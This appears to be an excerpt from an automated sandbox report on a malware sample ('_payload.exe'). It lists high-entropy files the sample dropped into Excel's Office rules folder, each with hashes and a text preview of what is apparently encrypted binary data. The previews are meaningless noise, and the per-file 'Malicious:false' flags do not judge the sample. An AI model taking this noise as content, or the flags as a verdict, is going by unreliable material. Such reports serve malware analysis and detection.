                                                                                                                                                                      Preview:<?xml.( ..m#...)P...o.....y.q.6.>...R....^.3..}{...._p...Q..D^.....A..AJ...nU.qX.X(TWh.2....R$.....j...AC..U@..a.S2.-....R.`......P.e..;.$.h.O..;.....q.....M....".Y....8F]wy.:w.0......a*....f.W..Z}......yt>2to.-z.......g...c.M..Ty.#..B..^.{)u...*...,.3.....D^...._.|g:lm....)-..>.fk...K.V....W...I3.>2..Y..V.yc.w... ...A..i...._.s..D..s....._.'.'.R..2oJ.W.........S. [...B..64.,...R..../*....I:.y....F3>....J.....,C.7..A:..f.x...#<%..k.I....9......G.?i.j`.i"H..!.u...x...t.9H.Ar.....c....=.d[......$...Y..\.3he.k.?z*..v.y'4.+..VvG.W.R~D...9.S.!.s..i.boO..g..F......"F.&.:,L...........yg.C.K.K.b>.n'2..R..GA.w.h.=a.L'...>...7U.....=....6.e\Q.N..M1h[,.wk...6qE..X....x...+".1.......75..hI/.MV..r.!=.. 3.!......^.....A.....Um..F.;.C<.....Zi.'..7.5.9...?....k..*Q..X.GR....N.........{NJ.)...".`..|llz..{..g......u....!#iB....8rz...._..x....UT........?.J.A..Ui.E..GA.J~..1.).....).Gek7mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63046v10.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1950
                                                                                                                                                                      Entropy (8bit):7.89228638136621
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:D3s2hJNSr6XN4NLty87U6pMC510CHQqfcojaTmfD:D3s2hJIMWFt1o6OUZHprjz
                                                                                                                                                                      MD5:AC4C4A99828DAB7FC2EBD374F3124145
                                                                                                                                                                      SHA1:1EE32991D37CB3CE7A9DEE9C450399B231B3033B
                                                                                                                                                                      SHA-256:28DF8A77E91F14CE996500615003A35DEB4EB080E51F205726F25B4A6253F686
                                                                                                                                                                      SHA-512:CCD27DC95084F03AA496EBC3DC2678444AC8AE4A90E14D167744C9D0231454B8C97B2CCDEEA70A9DEF54A78211AF855B04C1946741B9E44070BF7F44999B2C08
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.,wCo...........1;..?....~..hM.j8.,.}..W;...."A..../...o......8$=%.@.a...x8....J..P.Mt{...MP.9d#..}. 1.R.gQ...Q.t.....*2.......t....F|Ps.w.z_....!..#....l..rp.@.drT.DGN4H.......S..g.=..q.oU..........=..5....s1._....j.X.b.J`xCn.......@..T......J...6.M%..R.EG`.t....}...".o.z..;r...-'..i.........o.Hx.u..{..*M...h.7V....E.R.V.)..$.......I.Q..I'..F.n...).LF.......''8`......S.....l..y^{./...........t. .n.g...9..\1pO.,.Z......oI.}!.e.8....B55..p..@..B.1H9.o.*.4jC..;/.....hX..8.@.....9...&1.&.\/s.)sl$.QI...-VF....."...%.^.....H-.)A.......2.q.L...b..o....KitZo6C...1.B... a..u......?~....wx(...x]....}.*..b.L..A..pd.n...H..e..2...'.....<.....It......_....A..u...4+R0..&2).s5.U...r.....79.....u@.F...7.#...i...K....>.9.>..Uq..."..)._*O.f6..#.mB.2SP....#..i...-z:]V.LI.....y...y..*..Uu....=j.]..w.......2?9.....8x.*.....M.j..U..i...?..=.W.5...s...].K..2...yf{.....*...P.....(.s0...*..X.%.$.g1P..}&q..w..t...5B:.....>..I...hr~.......w...rf..R0.T<^B.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63048v6.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4121
                                                                                                                                                                      Entropy (8bit):7.9537261625629805
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:WFyt9CgXynnHcVFZq/Hx0Dv+4cv1DjiPCbbS/zj63O5BK/xM+fn:4C9CgGn8q0DW4MiGl+qjfn
                                                                                                                                                                      MD5:352CF37B0A4884690D6C2BCF64ECF7F5
                                                                                                                                                                      SHA1:8759AE71395348C6902944B0376D775B8DE51E4C
                                                                                                                                                                      SHA-256:E698BFDFEB3208A3A8B0BCA3E1E5344129BB1917C02ADF1D0B5EF7FEF676D975
                                                                                                                                                                      SHA-512:C0BE9EC0D6410BAA60D0719983D21865C70C2ACEA74399B0826603ED3295A3A9DC10EF9F3B188946B48AE2092F7F06B5D4FC9BF596542643506F3B272569EEFC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...T....r..X..UP....<...oij.L.h3#I]..a.H.J.......|`.....D=..X.M...N...v<...RP{[...-.=0....L*......H....B.7...;/B...l..N......I.....P..u.EJ.&$pw..uM..d..s./%.oE@G..H+....`..L.;...7..F.ep0..........p.c.R!......M.x.c..k.0t?.c.^P0'.p...4.*U....[.L...G<...r.R~.U{.2...K".....Y.......y.&.^.vfn..|..m.B+M.IH.z...r...a|.".\..V.f)P!.W.Z...E.......~.N.n..:.y\5.*.#.q....gu..u.k0.r...7.....!J...*]&\.../0.,A.t._...-.|&G].......A...............~.....2..7...ds.vk..FL`.o;0..Zc.w.]..Ox..c.h.fK.&..S....`|.k. ..3.z._.%.s.,..\....>d.2^i.97%..dX_=N.5|../ ..o.)...w7...f5...7d...6..6.` 4.I2.......R......S.)./..B....p._.h..dQ.....T......@...../e.m.e..Ft.aF......".[}.F.BkJvjI~..V..E6..!.$.R.d.}U..T........u.....%a...DZy...U.......l..4.......'.).L....b.3.....A9\....W....?.."...v.A.G..p.e.SM..........wZu..F.`.g=#.].9....r..u.X..,.......T81......P]_..;&]..k.3..=....cG.7..*.!{..d......r.I.>M.+..}..%]$I.P.[&........4S*#.D)..(......~..;.v.j..9...fh.....(&R...b..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63049v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1585
                                                                                                                                                                      Entropy (8bit):7.874853999290563
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:aZBt+5R8fU/E90oTRthigZxtW05nxs0bMuUdMfa4cCF4wSn9n+2bD:q+rVbo1thigrtRiHuUd14cCF4wUlD
                                                                                                                                                                      MD5:E352B037374108A9C729675382DE13C9
                                                                                                                                                                      SHA1:8B6363D1C5D2FD268A31ED3A6DA08DD252C674D6
                                                                                                                                                                      SHA-256:9B3D59B1D9146C950D2BA7A96CA1313E2F6EB223ACAD08177E73403C30E8D613
                                                                                                                                                                      SHA-512:7D563ED7FD234A187D6EB5B3B0D42627C5401E1B9BD51F74C809DDBECFD91A58A3FE22076EA5FB3D41D7C492453714C4B09337C5ACFCE502D31C1E5CC305BDAD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.Nf.E.i1j"d}yYl..... ...r.{.K.0 y..T4.39...Q.7.....8L#.o..;86.#..|..,..s...M..?..........bL.S.3.qB..7;p......X..:...2.C...&....Gm.7i....{..I...m........'%}.M.E../.F.*0F...R....<....G....a..l..{'.qPT.~.b.J.k.$..[kP.~J.......3.edE...w.h..P.6PyDw.../v..@F$|....P..rO..\=..G:..?....[..MT.,0Q..}.{..........,......R.o.../s.f...YY...yr..#.l..vj... ..j..g..1V....5..p.A.......u..."...?.G..1../`$.^...%..dS......B..M..B..xq.e..G...^....vx..5......k....p.oi>.[...[!.....s.P...:.YM..\.Z.X.H....v.'.{.[}.BD....t....}..w.R.[......B_ BK..:..d...xH..M.h.[.>n.e0.......r...2..,q/....k.l.a..@.......-..GH...i..3.......r%`w....cv.....q.|.i(4.Do..P..!.-.......%...<...l[...%.x..i..j.'.h.-H.A.o.......9~..|......=.$#...Q..;.P......2...2...g...n..R@). ./?...........Y.W\.....A...^.@....d..........o..Cx^.z.w....(.....N'g....../m..Q.VHo..O.1p...TO67.*..;..v.Mp..O,....S.[S>.l#..u...,...a$G...UO..}.....a...8i."[H.k..q.......,.....\..P.Zs...1bC.i...wy#w.>d. 6...-.).

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63051v5.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1939
                                                                                                                                                                      Entropy (8bit):7.905030905656539
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:julay+2vlp2kJDruEnZtkhR4nmRR6CNhx+XNQlqc10HD:julaz2dp2ODSEZaR4SxvmNG10j
                                                                                                                                                                      MD5:4795AF1016EE11B22613AE72F7D5FE4B
                                                                                                                                                                      SHA1:B8119433945AB81258466B51A7F7C1CA4BD0C02D
                                                                                                                                                                      SHA-256:082E14FA8BB6A2993E0298EEE79DA004B735B7771AF630B9C46DF6E63DDF3DE2
                                                                                                                                                                      SHA-512:87B7C738D60F937DD986032E5DE15B8DCBF38AEB13A94D1B32C2C775C63F989586A5C51935A44A44548BF71FBF5625F32B1A19E79B17E91548BC872D15953907
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.c{.+P/./.1..+..+^.h$.g.7...(.o..~.....H.$`.=......._...dD.l.&..@...P"4......3....8..!....d..A.@,3......!vA...<.=..1..F.a[..aaI.B%&Ne.!:..~.......2.=.B.P...|!..A.k\.~..w:.X.<..>.\...F3<..xC..P.`7le.m..^.)ne...2.z..._)......b..U..o.O.....lAf...!.Z..'....9!T$.2.F....+U kQ.....>$GC...{.-.;"....B.....[.k..lh'.u)...r.v1!y.DB...G..S..U{7.....-J.x..-H..5....4..>..cn..@.U.j_W`....tS.jf.%..b.j.4...M.8u.!3.P...l..'.,0My.Z1s<..*....H...... .......>)..?&...;........2.............=..5.............W..![......-....C.l....roE.4..g..>..o..{..{.A'...../..T..$.b......T^-$,.T....E.-VS..7z.L.Q.y.......I.\.g..B...-.|..)...-..cY.~.$...l.v8.6.....1.8<S:.2:],#..../C..z..3......sk.9....=3+.;SJ2.UT..0.O..D.[t.....-...Ffu..i.K.[.[..T#.v.w.C]`...t>.....{<.F.H....5...v....p.....Zs.#5..-..~..G....i..v$...;.........B...bq...4.g._..OS@..........................g5.yc...C.....W.O..-n.|.no,...t...8.oH.V...I.J.... ...]...d.i..a....n.0...=..+..c{...[....b.^

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63052v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3091
                                                                                                                                                                      Entropy (8bit):7.936266724120459
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:11YgkaHskHLvj5rgzfO0u5bMnAPXeFU5tFN8ESvJo0d5xWLuK9hD:1CgkqskHLLlgbA5bM05tpcJo0R1Kn
                                                                                                                                                                      MD5:80F336BBE25D413531D73E6F36909932
                                                                                                                                                                      SHA1:2BEEAD98227E43AE3D6A37E962F621A38906A9F0
                                                                                                                                                                      SHA-256:BD1EDFD07422420DA973A55B77E86B698E6CBB725F7B19043FE9071E1D6F21F3
                                                                                                                                                                      SHA-512:3A66E22D5FC9DFC5047700475258D2AC5FAF37434B945AEA390CBD59D13714B227209BBA1146EE653B0B6CDF94C4E4912A9EBD505D2F40A7FC01830D22F40C7A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.M......Kb...f.y..43k.dA.6.Rb..2..\<....F.e...a.t..S..P}...3FF.u.......a.....c..v+.xA...UH...._...|.q~...S+.....z.(4cGi..6.PwQ~}.L1m..c...A........0.2k.1|....6z..@..8.LhMn.e.}k..H^..>.'...........m.{.h..\..D.....&.....v&.h..&.....{....I?.-s..Z..{....(:......v...W0..Z.....s.*J...z..Z>"...b..C].{...Gm.#..GU.*..J.[ .E.J..f.....M..FQ1..f.ZI..`J....^..+..#+.d]..........;....K....J.;....0h..B..{..zXZ.~...qr.@;..+7...4*q..."%.YQ.E.q+B8...U.p._)a^@W..b.....O.....3|.e.B.e0.....,r".\}dM.}.....@.....c...l.h;.*....@..{;="Y5.Z..O.........j....O"w...h`.v.l.,..(.=.P...... ..".....z.9.......N.........a..ygh n...J.l.p.r=..6....n)..cl..g...)..-w...V......:...\...J.P.v.7.....?.].....L+.....X..^.....m.8.'.^.aP........JLHo.&]D.....8O.... Wxl..0.w..pH.b....ou5\.].S.-.+x_.k_.dN....|.:..W.$.......TC......p'w...yx....I....`H....'0.DH$...5fr.&.1y..~2..D+..<...F.o...RB.fsI........=.>FpT....u..(RD..........".{A..&2*.{..:..h....u;......4...#~ 6N,......-....{.Obl....z...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63053v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):980
                                                                                                                                                                      Entropy (8bit):7.791960743951939
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:GptDOc2YRM+Wx9fIorgymIuapAH4yADs2bD:Gp5RibAorgymg8RyD
                                                                                                                                                                      MD5:E4FADA2D7C60E452385D715B60AC7DDB
                                                                                                                                                                      SHA1:1EBFE82CB9767623B043A21FFA394B7EC4A815E8
                                                                                                                                                                      SHA-256:3194E41E88E2C7A38EB57904AE5C4E62BD31E0D2806E39BA656B441007AB6207
                                                                                                                                                                      SHA-512:CE1EB2B57FCF748220C8E136210D606879D57BE602143143F08C53A9F30BA18ABA82CB92A7C50A3EDBB525110F4C0A5E4BB462D52B13F4016D69FA05ACE7FACE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlL...Q.../%.r.-.O....xQ...;....bxL...I.".......z.....wo..b..j..Q....L.....u5..3^.i._...:.U.9`.m.(..W..v..9.....q.I..ZK....)q].C}$..U.aA.3R...:..<...>>}.K.2l.q7.......vkx...p....H.(@...+...e6.;.....V.W./$.W..~poNc#..w...&.E.pG`.!..{......x.........1M..Z.C....R`.M .O.u..T.$.....hl..pr.p....".......1.3..b.oY.:....v.p]..8m...D..'-7.W...?o..0.....4&s.)Z....?1.+.J+=..!.[9.......H.1."07c%.z5.b..Q.."?.m..b.]..0..Yl...f.]V1.....Q.=P....*].W..ax...Q.7..`.|[@`..I....#..s(......O.'.I......N..........z..Z.J.=....ZMQk[.9!!1.(d(.............b.T..........wq.......G.(..u...m.(5%....Q......)..tvi......}6./.9+..(60;....u.....&.~.YC:.,...ol6W..2t..Mj.<h.;...s&....fT..b.3....6.^...../.O....zJ.p....kst..(.>=.....(N.'.:.$.<.8`.i......b.RP.j.&d...V..B...]...<)..x. .....{..q....g.XV....:...]..._...H......[...B.O.......^..0.j=....._l"....g.~.m..vuB.K.%.j...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63054v5.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2404
                                                                                                                                                                      Entropy (8bit):7.913518793401067
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:WkddJmBUG/AVLx/u1SI4PpeKiafaMqeecl2bxXtSOJrmnQ4b0drUL6jCg4YvD:WkXgCGsLk1oPi5Mde0sxwOiQ4bHejh7
                                                                                                                                                                      MD5:875ACAD42842596797584BB5D3B4F5FA
                                                                                                                                                                      SHA1:F65DD3A7EF61DF946814C146FA964CE6F7146789
                                                                                                                                                                      SHA-256:6534AAF62B71548EA2AF665BE28964F2E48FBEB588C98A09D988A6AD75A51005
                                                                                                                                                                      SHA-512:9D0B2B389A0D3895704209A8623EE45CE675653534A387668FACF5DB1E301AC72EF409B0D3B387A7E02BA0612A93B598AC1D4EF4F50177A10AA9FC5D613D9D7D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.@N....2s.vs{K..FN]..,a?4+~D.]RO....Ki.;VV.]Lc.+....?&.^...'H......V........a.U.. ..@.Vg.a7..kh...m4....|}*y...B....K.B.s.......9(`.?0..GQE8.Q[....$.#...r........z$Y.....X....r...WqN..xV^....Nas.}in..@...`...d_.$<o.e<.."J...!#.t...e....l^Ey].|......s>...R....Zj@T..(.8z..."... .*.......u..a....u_X.`.I....>...]J....d..]....z.B+B......+3..\u..%7.R9Ts(...~......:.~..)...y.yw.8._..J.. .......5n^e*...f.Y-b...V..1.a LLC....U..a05......^{..ls.d..(.".|..J.....+...&vrs..&..Ut.. W9w.C.7..p..............1.........@..C.w....O...`.....$=..".......H......i=.:...M...|.../vv...F.}...)A.K...X..X^B.d.......Ht..Rh X...B..5..N3O..t....6..A]...o....1.6..e.h`..D.Y..N..:.....yq.t.=.T..)s.....5h^P...)m...JK.OV..-!\.}..LM.7`j.bWk.]../q...]........_.Co.AXK.N.8X.3.I......g{.FB.;3ys1f....&.t.n7...."..>.>~c.*..gOL......c...e....Q..C.q...4C..+...8o...d.....!......?........=...7..n.....v........|......9.$....|q.}..$+...Q....[$..S..tJea.d)]..d..H...3.'A.&....?`W

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63056v9.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3203
                                                                                                                                                                      Entropy (8bit):7.942378258630338
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:ASmPku9ZI0s3RI67sXZe3nCSsYreLaiWo:RmPtYn35wXZEnCS7reuiWo
                                                                                                                                                                      MD5:C2DBAFF1D188897C1C338DD9947CF4ED
                                                                                                                                                                      SHA1:5CF9696EA23C7D9DB05CC4749B97B554076307FC
                                                                                                                                                                      SHA-256:AF310DFD5DDAA468F6392E3134E17A100C73A8E0F14F440CA91F27E3AF647BB8
                                                                                                                                                                      SHA-512:18957E9FEBB4D85B0FAA3883166DB03353F646104494804E75A96ECE5DD26B1E6567BD341FB137C1DEE0C10004FE56FE27EA6C0842537620A7D1D26E73343ABE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml~.o.L...on.../..4..4!...aof.....#.-..Y.k_...H|nw9."8.f.f..@..o.8>.G.z...R..'.F.....0yn.X.|..a...".}.8.T.r.X..[.-........m.......Q......7{^...!.....U..P..J..T...zyv.L...Q...l.,Z"..la.$...NtA..."...0\.....B....Q.....@.....;.....8.s.%.Y...e...*......6........o.U...`._=..J]/.Y.Y....!.M.i..J1...P..5:.x.B^..,...^|7.f..$4.......x...._oq...V.rcZ.....5.Crt.Y....^9T.d.....r.LiuZ..iV#.~....w...Hb.`.R.f..q......#.u....B......+k.....*._..xwx...,.b.V..@j....oI.._..f.JQ.E.4...f...8j..J..........~{|zjUU2dp..l3Gz^.....$...-M.D.)..&V;V...q...q...N...`..8..^...5.u..l.w..D..*[.h.H....3.nm.E.M.>...rT....u..8Q......F_..A.N....F.=..!.}A..%...GHa.w....r..9.j}....c).....~`Y._~..P].yR......My.bn......Tn~...:Fs..gb.XwJ......;..J.w.8....?..xS...%..>..+D...N.6MSx.^..'.jgM.."*.......O...n:q.U.......Nl.=..{A!.L..w....zU....N%Z.U....%JG....E^7I:..........w...Hr..L........sD.....O8..T..^.Q~..W.....$.A..O.j. s..no.ky..@.IJ^{#.Y&.#...hOH^.i....C%o.....x|.E..gL.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63057v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2512
                                                                                                                                                                      Entropy (8bit):7.921712575378219
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:IK32nFYfIf7J4J7rujarOZxt4Uv+hGnPK9ljU8G7PRjdMWD:m7JRxt42LP0ljXG7pR1
                                                                                                                                                                      MD5:B958EB5AD9CF9035C7ABFDCCA9C33CDB
                                                                                                                                                                      SHA1:85BE9826215D29295A79F39E463D69F68BE79E86
                                                                                                                                                                      SHA-256:6E978B50EDE20D20B78F52DF95E015C24D2538540AD35E39E2CBFB2A0116AD11
                                                                                                                                                                      SHA-512:2A35B750B839840FEF1A370B66EE0EC523F8A6B111D35C05D0A2DAFAB3848003939AB7C7D16B4AC4C1DA570448F93B4C33F1A217FF7CA696C6A2EEE2B3C489FC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml<..*.+.cY...K..M.c..r1.^.$......P.....&_8v..e......l..1/.{..!F.I..yjaX'D...s.u...#i..k...Gp..W.)^.~..Zf..U.z............g....f.{...N.....M.H.=...M) ..;...jJ..x3...Xd..b.#.(.(]..g....ju.7.t6e..(..yi....&.Yj.fT.O>...K..@..J....d.O.....C........M(..s8.gR....O......S...G.o6.^Y...n#.Pm..k=..w...1.{..._....nO .W......3...$K.G.. q.....=.....W...i..z/7..+..... ..o.I...y..;.)...E..k.8...X0..z.U.F...].....R.`...n._.......?.%T*c9.......R........%.....$./......v.8t.}..~....+..G....<.2]...Y2..P..UV..K.@...L.$...B....ME....ps.......w.d...k8Z....y.9..D.:4.I|.n.,.PlZ."./.....x..-.{""s....%.~..1c.'.._..b7.A.f.....Jw. .*....b..^.ru.}.Z....x.^N......|..t_.HS..: .Q.l22.O%...]WD.}.+k.'....#)...m..m..E*.:..;.l.z_q....3fi.S.T.f......*....z,S......;..q1.].i..%.n?.B...)F.^!.L..8..5....O`v.}[e.g...YM....9..`........S.........2.|@..o.)=..o.......).....3...+J....Mi.Hp!..)lp....P.W....\...3.1.i..QjM.. ..4.H.;xjd..no...........x=..y.|.n_.V...j...0TA.cp-..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63058v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1247
                                                                                                                                                                      Entropy (8bit):7.835551554135614
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:eWMehNXsFsu6iQHyE0zoVob7npP/2qugi34jHeySqZV2bD:9KmopP/2sjtJYD
                                                                                                                                                                      MD5:369686F8F3A3F15BDD20AE8B6CEBD93A
                                                                                                                                                                      SHA1:D5CFAC49A1F32CC34E4DA2DC078740BF4AECC833
                                                                                                                                                                      SHA-256:F3A86CA296B06E24C19C3169472FBAA5DFC33922DCD59EC8B13D30E344503224
                                                                                                                                                                      SHA-512:60AE7807E9BB956F283351F784772CF787858C53BB8B0C1D08AFF95117D9F8BE8CA042D786E7858DC31BD44F600BBC3447479D99517B7A2F1F41C34EB280A216
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml......nB6......#....gwa.E....9]n'^n7..& ....V...<.............t/ .....E.h(N%..(...O,~*....Z..l......*%..\....k..K..M5 \\BH..o.F.$.G....;.....).C6.PT...."...kT.}q.X.`.M7d.Dc....s98.....l.....F1.......}.n..row...;v..h.R....*..T......V ..`.."...."P+.Y.S!.`.0....(3._\..|.r`......?.."M...lg..0....=..R...7q-R....U...7.......<4,...K..P..zD.....S^L..D[Pz..9.b.E..;.....L..N..`.!............F*c^.g%g...bfF..c..s..B..._.q.g......5k..7l..u`.."...."..\...>..D..K.9.gd....W.V.W5-+K0......~..*...Y....w..../3.*........._.J..9z.....?Q..jto.._....m./....Zl....s.,J...h..n).\"I.....&...BF..|lk......d..D.ksES...\W.{.*x*..}.S...Z.d.~..p.[.X`..%....d...j;...[(hM.......l.......eo"....5|h...M.lx.Z.).l.....a.<Z.hC....J....t).....Z.o.+~.?>.....}...`..'.Li9o.....D..%... ,.....WD..haq..W..=.zg..L..w:...}..FP..wu0...H...[R...0.b.a).t.....c-...i..]dV.wGn[.k.P8M8........d.S.v...l....Y.G.......M.A]r...+w....B]5THR...._~4d.n.....^.4T...|...n..z..@.T,....5.....s._..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63059v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):950
                                                                                                                                                                      Entropy (8bit):7.753994458631799
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:oZhrZ2od3FTNwNbC/Ni8//ADBYgu4YoV2bD:oZhrZ2A39NwhhYouD
                                                                                                                                                                      MD5:0220FA26D9BFF4ABEE0B11F3CAE8E4D7
                                                                                                                                                                      SHA1:C22AA76667ADEF46BB9FDAC13AF49E979D183BA3
                                                                                                                                                                      SHA-256:221F84C859429D271BDB44DDE56F86E65A022E0A7E30CE26B000E2D43AEA7847
                                                                                                                                                                      SHA-512:2609D0759F919F628BB053450C198BD75D41CFC8385987658FC857A3009D59B154F7354A44D233AEC2771BFCCD6723E71138D9835081FEFD2C4670CC7D0E2DF4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..H@..|.`.R.;..N.Z.......v...l.}$.'y..)D..3.2. .k ...{..!~3...fn...0....]...9........%.}>..95...s.g..e.0..1$%qNR..q.....7...,F.p_..|.;.c..5..I.....~....B!'.....u%.n.........x+...[@.4.^..kb5.D..i..2..?%...1.......8~......c.&M.S..6x6n.4'.99..0.=6'.U....Q9~.nd.k.xf.T...;jU.P...o.?..>|83-..[)P....8#..R.+.m..T9...........9....n}...h,.D....x.c.'..%.....ui.*i......'....L..q.....u.B..<.t....M+..U...V..&9._2......f.s.z..j..=........b...(.H.(R[...g$..v...g}F05.8..NE.4....+..F......A..n].........9D.nG<...QH5.X+....~]....2.q.?.*&!:.....)..W....#.]...w.,.&.w...L;n...F.l.....y..:M.7..cjs.b.F...:..y....$...-....2Nn.m.q._%.(...qt9.n...k.Ek.l..#L..U.H8..nB.R..1`.R..ggn...{....r...".....pzX....p..,.<Q.v..5..$.9*e.M..P......B.E....vh....-.....M\.....N.u....1a...6o..}.6Y...b.$&[@JJ.z.i&...}K6;o:.Ki!1M..P}.Z.......@v.>mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63063v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1125
                                                                                                                                                                      Entropy (8bit):7.797558928592965
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:M4VKYp8RxIeOBmK0gdlmlQdLemCHoV7W5zoK2bD:MA2RytXdSESmOoV78oBD
                                                                                                                                                                      MD5:EBB34FFAE3503C3CE9CC90693B0810DC
                                                                                                                                                                      SHA1:10294C97C274074368512A4B9EA49E7EB3DEC13A
                                                                                                                                                                      SHA-256:9BE6B0D3AD04DF53F6BE46D11DAE08971CFC49525D80DDDC5610C4875A60BE36
                                                                                                                                                                      SHA-512:D7B6994BEA67736658296D7E2CFEE97486359A07B0FF9A4098AAC28B421AACECA88F644383D21DC1AD7828F55F5275BBFC35ACC9222D7ED610C016DE39C4C9CD
                                                                                                                                                                      Malicious:false
